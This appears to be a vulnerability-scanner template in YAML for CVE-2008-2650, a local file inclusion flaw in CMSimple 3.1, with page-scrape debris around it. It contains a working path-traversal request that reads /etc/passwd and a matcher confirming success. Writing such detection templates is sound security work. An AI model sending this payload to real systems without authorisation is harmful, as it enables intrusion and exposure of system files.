24 lines
568 B
YAML
24 lines
568 B
YAML
id: CVE-2008-2650
|
|
info:
|
|
name: CMSimple 3.1 - Local File Inclusion
|
|
author: pussycat0x
|
|
severity: high
|
|
reference: https://www.exploit-db.com/exploits/5700
|
|
tags: cve,cve2008,lfi
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|